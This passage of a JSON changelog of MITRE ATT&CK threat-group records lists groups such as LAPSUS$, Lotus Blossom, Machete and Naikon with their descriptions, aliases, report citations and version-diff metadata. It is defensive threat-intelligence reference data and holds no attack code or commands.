(Citation: Securelist GCMAN)", + "aliases": [ + "GCMAN" + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0036", + "external_id": "G0036" + }, + { + "source_name": "GCMAN", + "description": "(Citation: Securelist GCMAN)" + }, + { + "source_name": "Securelist GCMAN", + "description": "Kaspersky Lab's Global Research & Analysis Team. (2016, February 8). APT-style bank robberies increase with Metel, GCMAN and Carbanak 2.0 attacks. Retrieved April 20, 2016.", + "url": "https://securelist.com/apt-style-bank-robberies-increase-with-metel-gcman-and-carbanak-2-0-attacks/73638/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:49:37.572000+00:00\", \"old_value\": \"2025-04-16 20:37:40.552000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "intrusion-set", + "id": "intrusion-set--2fd2be6a-d3a2-4a65-b499-05ea2693abee", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2019-01-30 14:26:42.897000+00:00", + "modified": "2025-04-25 14:49:34.304000+00:00", + "name": "Gallmaker", + "description": "[Gallmaker](https://attack.mitre.org/groups/G0084) is a cyberespionage group that has targeted victims in the Middle East and has been active since at least December 2017. 
The group has mainly targeted victims in the defense, military, and government sectors.(Citation: Symantec Gallmaker Oct 2018)", + "aliases": [ + "Gallmaker" + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0084", + "external_id": "G0084" + }, + { + "source_name": "Gallmaker", + "description": "(Citation: Symantec Gallmaker Oct 2018)" + }, + { + "source_name": "Symantec Gallmaker Oct 2018", + "description": "Symantec Security Response. (2018, October 10). Gallmaker: New Attack Group Eschews Malware to Live off the Land. Retrieved November 27, 2018.", + "url": "https://www.symantec.com/blogs/threat-intelligence/gallmaker-attack-group" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:49:34.304000+00:00\", \"old_value\": \"2025-04-16 20:37:40.106000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "intrusion-set", + "id": "intrusion-set--1f21da59-6a13-455b-afd0-d58d0a5a7d27", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2018-10-17 00:14:20.652000+00:00", + "modified": "2025-04-25 14:49:11.522000+00:00", + "name": "Gorgon Group", + "description": "[Gorgon Group](https://attack.mitre.org/groups/G0078) is a threat group consisting of members who are suspected to be Pakistan-based or have other connections to Pakistan. The group has performed a mix of criminal and targeted attacks, including campaigns against government organizations in the United Kingdom, Spain, Russia, and the United States. 
(Citation: Unit 42 Gorgon Group Aug 2018)", + "aliases": [ + "Gorgon Group" + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0078", + "external_id": "G0078" + }, + { + "source_name": "Gorgon Group", + "description": "(Citation: Unit 42 Gorgon Group Aug 2018)" + }, + { + "source_name": "Unit 42 Gorgon Group Aug 2018", + "description": "Falcone, R., et al. (2018, August 02). The Gorgon Group: Slithering Between Nation State and Cybercrime. Retrieved August 7, 2018.", + "url": "https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.5", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:49:11.522000+00:00\", \"old_value\": \"2025-04-16 20:37:36.314000+00:00\"}}}", + "previous_version": "1.5" + }, + { + "type": "intrusion-set", + "id": "intrusion-set--e5603ea8-4c36-40e7-b7af-a077d24fedc1", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2021-09-24 21:41:34.797000+00:00", + "modified": "2025-04-25 14:49:40.589000+00:00", + "name": "IndigoZebra", + "description": "[IndigoZebra](https://attack.mitre.org/groups/G0136) is a suspected Chinese cyber espionage group that has been targeting Central Asian governments since at least 2014.(Citation: HackerNews IndigoZebra July 2021)(Citation: Checkpoint IndigoZebra July 2021)(Citation: Securelist APT Trends Q2 2017)", + "aliases": [ + "IndigoZebra" + ], + "revoked": false, + "external_references": [ + { + "source_name": 
"mitre-attack", + "url": "https://attack.mitre.org/groups/G0136", + "external_id": "G0136" + }, + { + "source_name": "IndigoZebra", + "description": "(Citation: HackerNews IndigoZebra July 2021)(Citation: Checkpoint IndigoZebra July 2021)(Citation: Securelist APT Trends Q2 2017)" + }, + { + "source_name": "HackerNews IndigoZebra July 2021", + "description": "Lakshmanan, R.. (2021, July 1). IndigoZebra APT Hacking Campaign Targets the Afghan Government. Retrieved September 24, 2021.", + "url": "https://thehackernews.com/2021/07/indigozebra-apt-hacking-campaign.html" + }, + { + "source_name": "Checkpoint IndigoZebra July 2021", + "description": "CheckPoint Research. (2021, July 1). IndigoZebra APT continues to attack Central Asia with evolving tools. Retrieved September 24, 2021.", + "url": "https://research.checkpoint.com/2021/indigozebra-apt-continues-to-attack-central-asia-with-evolving-tools/" + }, + { + "source_name": "Securelist APT Trends Q2 2017", + "description": "Kaspersky Lab's Global Research & Analysis Team. (2017, August 8). APT Trends report Q2 2017. 
Retrieved February 15, 2018.", + "url": "https://securelist.com/apt-trends-report-q2-2017/79332/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Pooja Natarajan, NEC Corporation India", + "Yoshihiro Kori, NEC Corporation", + "Manikantan Srinivasan, NEC Corporation India" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:49:40.589000+00:00\", \"old_value\": \"2025-04-16 20:37:41.185000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "intrusion-set", + "id": "intrusion-set--d8bc9788-4f7d-41a9-9e9d-ee1ea18a8cf7", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2022-06-09 19:14:31.327000+00:00", + "modified": "2025-04-21 19:40:47.538000+00:00", + "name": "LAPSUS$", + "description": "[LAPSUS$](https://attack.mitre.org/groups/G1004) is cyber criminal threat group that has been active since at least mid-2021. [LAPSUS$](https://attack.mitre.org/groups/G1004) specializes in large-scale social engineering and extortion operations, including destructive attacks without the use of ransomware. 
The group has targeted organizations globally, including in the government, manufacturing, higher education, energy, healthcare, technology, telecommunications, and media sectors.(Citation: BBC LAPSUS Apr 2022)(Citation: MSTIC DEV-0537 Mar 2022)(Citation: UNIT 42 LAPSUS Mar 2022)", + "aliases": [ + "LAPSUS$", + "DEV-0537", + "Strawberry Tempest" + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G1004", + "external_id": "G1004" + }, + { + "source_name": "Strawberry Tempest", + "description": "(Citation: Microsoft Threat Actor Naming July 2023)" + }, + { + "source_name": "DEV-0537", + "description": "(Citation: MSTIC DEV-0537 Mar 2022)" + }, + { + "source_name": "BBC LAPSUS Apr 2022", + "description": "BBC. (2022, April 1). LAPSUS: Two UK Teenagers Charged with Hacking for Gang. Retrieved June 9, 2022.", + "url": "https://www.bbc.com/news/technology-60953527" + }, + { + "source_name": "Microsoft Threat Actor Naming July 2023", + "description": "Microsoft . (2023, July 12). How Microsoft names threat actors. Retrieved November 17, 2023.", + "url": "https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide" + }, + { + "source_name": "MSTIC DEV-0537 Mar 2022", + "description": "MSTIC, DART, M365 Defender. (2022, March 24). DEV-0537 Criminal Actor Targeting Organizations for Data Exfiltration and Destruction. Retrieved May 17, 2022.", + "url": "https://www.microsoft.com/security/blog/2022/03/22/dev-0537-criminal-actor-targeting-organizations-for-data-exfiltration-and-destruction/" + }, + { + "source_name": "UNIT 42 LAPSUS Mar 2022", + "description": "UNIT 42. (2022, March 24). Threat Brief: Lapsus$ Group. 
Retrieved May 17, 2022.", + "url": "https://unit42.paloaltonetworks.com/lapsus-group/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "David Hughes, BT Security", + "Matt Brenton, Zurich Insurance Group", + "Fl\u00e1vio Costa, @Seguran\u00e7a Descomplicada", + "Caio Silva" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack", + "mobile-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "2.1", + "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-21 19:40:47.538000+00:00\", \"old_value\": \"2025-04-07 14:44:59.715000+00:00\"}, \"root['x_mitre_contributors'][2]\": {\"new_value\": \"Fl\\u00e1vio Costa, @Seguran\\u00e7a Descomplicada\", \"old_value\": \"Flavio Costa, Cisco\"}}}", + "previous_version": "2.1" + }, + { + "type": "intrusion-set", + "id": "intrusion-set--88b7dbc2-32d3-4e31-af2f-3fc24e1582d7", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-05-31 21:32:01.092000+00:00", + "modified": "2025-04-23 21:20:58.367000+00:00", + "name": "Lotus Blossom", + "description": "[Lotus Blossom](https://attack.mitre.org/groups/G0030) is a long-standing threat group largely targeting various entities in Asia since at least 2009. 
In addition to government and related targets, [Lotus Blossom](https://attack.mitre.org/groups/G0030) has also targeted entities such as digital certificate issuers.(Citation: Lotus Blossom Jun 2015)(Citation: Symantec Bilbug 2022)(Citation: Cisco LotusBlossom 2025)", + "aliases": [ + "Lotus Blossom", + "DRAGONFISH", + "Spring Dragon", + "RADIUM", + "Raspberry Typhoon", + "Bilbug", + "Thrip" + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0030", + "external_id": "G0030" + }, + { + "source_name": "DRAGONFISH", + "description": "(Citation: Accenture Dragonfish Jan 2018)" + }, + { + "source_name": "Thrip", + "description": "(Citation: Cisco LotusBlossom 2025)" + }, + { + "source_name": "Lotus Blossom", + "description": "(Citation: Lotus Blossom Jun 2015)(Citation: Accenture Dragonfish Jan 2018)" + }, + { + "source_name": "RADIUM", + "description": "(Citation: Microsoft Threat Actor Naming July 2023)" + }, + { + "source_name": "Raspberry Typhoon", + "description": "(Citation: Microsoft Threat Actor Naming July 2023)" + }, + { + "source_name": "Spring Dragon", + "description": "(Citation: Spring Dragon Jun 2015)(Citation: Accenture Dragonfish Jan 2018)" + }, + { + "source_name": "Bilbug", + "description": "(Citation: Symantec Bilbug 2022)" + }, + { + "source_name": "Accenture Dragonfish Jan 2018", + "description": "Accenture Security. (2018, January 27). DRAGONFISH DELIVERS NEW FORM OF ELISE MALWARE TARGETING ASEAN DEFENCE MINISTERS\u2019 MEETING AND ASSOCIATES. Retrieved November 17, 2024.", + "url": "https://web.archive.org/web/20190508165226/https://www.accenture.com/t20180127T003755Z_w_/us-en/_acnmedia/PDF-46/Accenture-Security-Dragonfish-Threat-Analysis.pdf" + }, + { + "source_name": "Spring Dragon Jun 2015", + "description": "Baumgartner, K.. (2015, June 17). The Spring Dragon APT. 
Retrieved February 15, 2016.", + "url": "https://securelist.com/the-spring-dragon-apt/70726/" + }, + { + "source_name": "Lotus Blossom Jun 2015", + "description": "Falcone, R., et al.. (2015, June 16). Operation Lotus Blossom. Retrieved February 15, 2016.", + "url": "https://www.paloaltonetworks.com/resources/research/unit42-operation-lotus-blossom.html" + }, + { + "source_name": "Cisco LotusBlossom 2025", + "description": "Joey Chen, Cisco Talos. (2025, February 27). Lotus Blossom espionage group targets multiple industries with different versions of Sagerunex and hacking tools. Retrieved March 15, 2025.", + "url": "https://blog.talosintelligence.com/lotus-blossom-espionage-group/" + }, + { + "source_name": "Microsoft Threat Actor Naming July 2023", + "description": "Microsoft . (2023, July 12). How Microsoft names threat actors. Retrieved November 17, 2023.", + "url": "https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide" + }, + { + "source_name": "Symantec Bilbug 2022", + "description": "Symntec Threat Hunter Team. (2022, November 12). Billbug: State-sponsored Actor Targets Cert Authority, Government Agencies in Multiple Asian Countries. 
Retrieved March 15, 2025.", + "url": "https://www.security.com/threat-intelligence/espionage-asia-governments-cert-authority" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Prinesha Dobariya" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "4.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_contributors']\": [\"Prinesha Dobariya\"]}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-23 21:20:58.367000+00:00\", \"old_value\": \"2025-04-04 17:35:44.589000+00:00\"}}}", + "previous_version": "4.0" + }, + { + "type": "intrusion-set", + "id": "intrusion-set--38863958-a201-4ce1-9dbe-539b0b6804e0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2019-09-13 12:37:10.394000+00:00", + "modified": "2025-04-25 14:49:22.323000+00:00", + "name": "Machete", + "description": "[Machete](https://attack.mitre.org/groups/G0095) is a suspected Spanish-speaking cyber espionage group that has been active since at least 2010. It has primarily focused its operations within Latin America, with a particular emphasis on Venezuela, but also in the US, Europe, Russia, and parts of Asia. 
[Machete](https://attack.mitre.org/groups/G0095) generally targets high-profile organizations such as government institutions, intelligence services, and military units, as well as telecommunications and power companies.(Citation: Cylance Machete Mar 2017)(Citation: Securelist Machete Aug 2014)(Citation: ESET Machete July 2019)(Citation: 360 Machete Sep 2020)", + "aliases": [ + "Machete", + "APT-C-43", + "El Machete" + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0095", + "external_id": "G0095" + }, + { + "source_name": "Machete", + "description": "(Citation: Securelist Machete Aug 2014)(Citation: ESET Machete July 2019)(" + }, + { + "source_name": "APT-C-43", + "description": "(Citation: 360 Machete Sep 2020)" + }, + { + "source_name": "El Machete", + "description": "(Citation: Cylance Machete Mar 2017)" + }, + { + "source_name": "Cylance Machete Mar 2017", + "description": "The Cylance Threat Research Team. (2017, March 22). El Machete's Malware Attacks Cut Through LATAM. Retrieved September 13, 2019.", + "url": "https://threatvector.cylance.com/en_us/home/el-machete-malware-attacks-cut-through-latam.html" + }, + { + "source_name": "Securelist Machete Aug 2014", + "description": "Kaspersky Global Research and Analysis Team. (2014, August 20). El Machete. Retrieved September 13, 2019.", + "url": "https://securelist.com/el-machete/66108/" + }, + { + "source_name": "ESET Machete July 2019", + "description": "ESET. (2019, July). MACHETE JUST GOT SHARPER Venezuelan government institutions under attack. Retrieved September 13, 2019.", + "url": "https://www.welivesecurity.com/wp-content/uploads/2019/08/ESET_Machete.pdf" + }, + { + "source_name": "360 Machete Sep 2020", + "description": "kate. (2020, September 25). APT-C-43 steals Venezuelan military secrets to provide intelligence support for the reactionaries \u2014 HpReact campaign. 
Retrieved November 20, 2020.", + "url": "https://blog.360totalsecurity.com/en/apt-c-43-steals-venezuelan-military-secrets-to-provide-intelligence-support-for-the-reactionaries-hpreact-campaign/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Matias Nicolas Porolli, ESET" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "2.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:49:22.323000+00:00\", \"old_value\": \"2025-04-16 20:37:37.929000+00:00\"}}}", + "previous_version": "2.0" + }, + { + "type": "intrusion-set", + "id": "intrusion-set--2e5d3a83-fe00-41a5-9b60-237efc84832f", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-05-31 21:31:46.025000+00:00", + "modified": "2025-04-25 14:49:46.105000+00:00", + "name": "Moafee", + "description": "[Moafee](https://attack.mitre.org/groups/G0002) is a threat group that appears to operate from the Guandong Province of China. Due to overlapping TTPs, including similar custom tools, Moafee is thought to have a direct or indirect relationship with the threat group [DragonOK](https://attack.mitre.org/groups/G0017). (Citation: Haq 2014)", + "aliases": [ + "Moafee" + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0002", + "external_id": "G0002" + }, + { + "source_name": "Moafee", + "description": "(Citation: Haq 2014)" + }, + { + "source_name": "Haq 2014", + "description": "Haq, T., Moran, N., Scott, M., & Vashisht, S. O. (2014, September 10). The Path to Mass-Producing Cyber Attacks [Blog]. 
Retrieved November 12, 2014.", + "url": "https://www.fireeye.com/blog/threat-research/2014/09/the-path-to-mass-producing-cyber-attacks.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:49:46.105000+00:00\", \"old_value\": \"2025-04-16 20:37:41.833000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "intrusion-set", + "id": "intrusion-set--025bdaa9-897d-4bad-afa6-013ba5734653", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2018-01-16 16:13:52.465000+00:00", + "modified": "2025-04-25 14:49:46.469000+00:00", + "name": "NEODYMIUM", + "description": "[NEODYMIUM](https://attack.mitre.org/groups/G0055) is an activity group that conducted a campaign in May 2016 and has heavily targeted Turkish victims. The group has demonstrated similarity to another activity group called [PROMETHIUM](https://attack.mitre.org/groups/G0056) due to overlapping victim and campaign characteristics. (Citation: Microsoft NEODYMIUM Dec 2016) (Citation: Microsoft SIR Vol 21) [NEODYMIUM](https://attack.mitre.org/groups/G0055) is reportedly associated closely with [BlackOasis](https://attack.mitre.org/groups/G0063) operations, but evidence that the group names are aliases has not been identified. 
(Citation: CyberScoop BlackOasis Oct 2017)", + "aliases": [ + "NEODYMIUM" + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0055", + "external_id": "G0055" + }, + { + "source_name": "NEODYMIUM", + "description": "(Citation: Microsoft NEODYMIUM Dec 2016) (Citation: Microsoft SIR Vol 21)" + }, + { + "source_name": "Microsoft NEODYMIUM Dec 2016", + "description": "Microsoft. (2016, December 14). Twin zero-day attacks: PROMETHIUM and NEODYMIUM target individuals in Europe. Retrieved November 27, 2017.", + "url": "https://blogs.technet.microsoft.com/mmpc/2016/12/14/twin-zero-day-attacks-promethium-and-neodymium-target-individuals-in-europe/" + }, + { + "source_name": "Microsoft SIR Vol 21", + "description": "Anthe, C. et al. (2016, December 14). Microsoft Security Intelligence Report Volume 21. Retrieved November 27, 2017.", + "url": "http://download.microsoft.com/download/E/B/0/EB0F50CC-989C-4B66-B7F6-68CD3DC90DE3/Microsoft_Security_Intelligence_Report_Volume_21_English.pdf" + }, + { + "source_name": "CyberScoop BlackOasis Oct 2017", + "description": "Bing, C. (2017, October 16). Middle Eastern hacking group is using FinFisher malware to conduct international espionage. 
Retrieved February 15, 2018.", + "url": "https://www.cyberscoop.com/middle-eastern-hacking-group-using-finfisher-malware-conduct-international-espionage/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:49:46.469000+00:00\", \"old_value\": \"2025-04-16 20:37:41.988000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "intrusion-set", + "id": "intrusion-set--2a158b0a-7ef8-43cb-9985-bf34d1e12050", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-05-31 21:31:54.232000+00:00", + "modified": "2025-04-25 14:49:21.044000+00:00", + "name": "Naikon", + "description": "[Naikon](https://attack.mitre.org/groups/G0019) is assessed to be a state-sponsored cyber espionage group attributed to the Chinese People\u2019s Liberation Army\u2019s (PLA) Chengdu Military Region Second Technical Reconnaissance Bureau (Military Unit Cover Designator 78020).(Citation: CameraShy) Active since at least 2010, [Naikon](https://attack.mitre.org/groups/G0019) has primarily conducted operations against government, military, and civil organizations in Southeast Asia, as well as against international bodies such as the United Nations Development Programme (UNDP) and the Association of Southeast Asian Nations (ASEAN).(Citation: CameraShy)(Citation: Baumgartner Naikon 2015) \n\nWhile [Naikon](https://attack.mitre.org/groups/G0019) shares some characteristics with [APT30](https://attack.mitre.org/groups/G0013), the two groups do not appear to be exact matches.(Citation: Baumgartner Golovkin Naikon 2015)", + 
"aliases": [ + "Naikon" + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0019", + "external_id": "G0019" + }, + { + "source_name": "Naikon", + "description": "(Citation: Baumgartner Naikon 2015)(Citation: CameraShy)(Citation: Baumgartner Golovkin Naikon 2015)" + }, + { + "source_name": "CameraShy", + "description": "ThreatConnect Inc. and Defense Group Inc. (DGI). (2015, September 23). Project CameraShy: Closing the Aperture on China's Unit 78020. Retrieved December 17, 2015.", + "url": "http://cdn2.hubspot.net/hubfs/454298/Project_CAMERASHY_ThreatConnect_Copyright_2015.pdf" + }, + { + "source_name": "Baumgartner Naikon 2015", + "description": "Baumgartner, K., Golovkin, M.. (2015, May). The MsnMM Campaigns: The Earliest Naikon APT Campaigns. Retrieved April 10, 2019.", + "url": "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07205555/TheNaikonAPT-MsnMM1.pdf" + }, + { + "source_name": "Baumgartner Golovkin Naikon 2015", + "description": "Baumgartner, K., Golovkin, M.. (2015, May 14). The Naikon APT. 
Retrieved January 14, 2015.", + "url": "https://securelist.com/the-naikon-apt/69953/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Kyaw Pyiyt Htet, @KyawPyiytHtet" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "2.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:49:21.044000+00:00\", \"old_value\": \"2025-04-16 20:37:37.579000+00:00\"}}}", + "previous_version": "2.0" + }, + { + "type": "intrusion-set", + "id": "intrusion-set--f9c06633-dcff-48a1-8588-759e7cec5694", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2018-04-18 17:59:24.739000+00:00", + "modified": "2025-04-25 14:49:07.040000+00:00", + "name": "PLATINUM", + "description": "[PLATINUM](https://attack.mitre.org/groups/G0068) is an activity group that has targeted victims since at least 2009. The group has focused on targets associated with governments and related organizations in South and Southeast Asia. (Citation: Microsoft PLATINUM April 2016)", + "aliases": [ + "PLATINUM" + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0068", + "external_id": "G0068" + }, + { + "source_name": "PLATINUM", + "description": "(Citation: Microsoft PLATINUM April 2016)" + }, + { + "source_name": "Microsoft PLATINUM April 2016", + "description": "Windows Defender Advanced Threat Hunting Team. (2016, April 29). PLATINUM: Targeted attacks in South and Southeast Asia. 
Retrieved February 15, 2018.", + "url": "https://download.microsoft.com/download/2/2/5/225BFE3E-E1DE-4F5B-A77B-71200928D209/Platinum%20feature%20article%20-%20Targeted%20attacks%20in%20South%20and%20Southeast%20Asia%20April%202016.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Ryan Becwar" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.3", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:49:07.040000+00:00\", \"old_value\": \"2025-04-16 20:37:35.512000+00:00\"}}}", + "previous_version": "1.3" + }, + { + "type": "intrusion-set", + "id": "intrusion-set--fe98767f-9df8-42b9-83c9-004b1dec8647", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-05-31 21:31:50.198000+00:00", + "modified": "2025-04-25 14:49:38.981000+00:00", + "name": "PittyTiger", + "description": "[PittyTiger](https://attack.mitre.org/groups/G0011) is a threat group believed to operate out of China that uses multiple different types of malware to maintain command and control.(Citation: Bizeul 2014)(Citation: Villeneuve 2014)", + "aliases": [ + "PittyTiger" + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0011", + "external_id": "G0011" + }, + { + "source_name": "PittyTiger", + "description": "(Citation: Bizeul 2014) (Citation: Villeneuve 2014)" + }, + { + "source_name": "Bizeul 2014", + "description": "Bizeul, D., Fontarensky, I., Mouchoux, R., Perigaud, F., Pernet, C. (2014, July 11). Eye of the Tiger. 
Retrieved September 29, 2015.", + "url": "https://airbus-cyber-security.com/the-eye-of-the-tiger/" + }, + { + "source_name": "Villeneuve 2014", + "description": "Villeneuve, N., Homan, J. (2014, July 31). Spy of the Tiger. Retrieved September 29, 2015.", + "url": "https://www.fireeye.com/blog/threat-research/2014/07/spy-of-the-tiger.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.2", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:49:38.981000+00:00\", \"old_value\": \"2025-04-16 20:37:40.885000+00:00\"}}}", + "previous_version": "1.2" + }, + { + "type": "intrusion-set", + "id": "intrusion-set--7ecc3b4f-5cdb-457e-b55a-df376b359446", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-05-31 21:32:04.179000+00:00", + "modified": "2025-04-25 14:49:33.223000+00:00", + "name": "Poseidon Group", + "description": "[Poseidon Group](https://attack.mitre.org/groups/G0033) is a Portuguese-speaking threat group that has been active since at least 2005. The group has a history of using information exfiltrated from victims to blackmail victim companies into contracting the [Poseidon Group](https://attack.mitre.org/groups/G0033) as a security firm. 
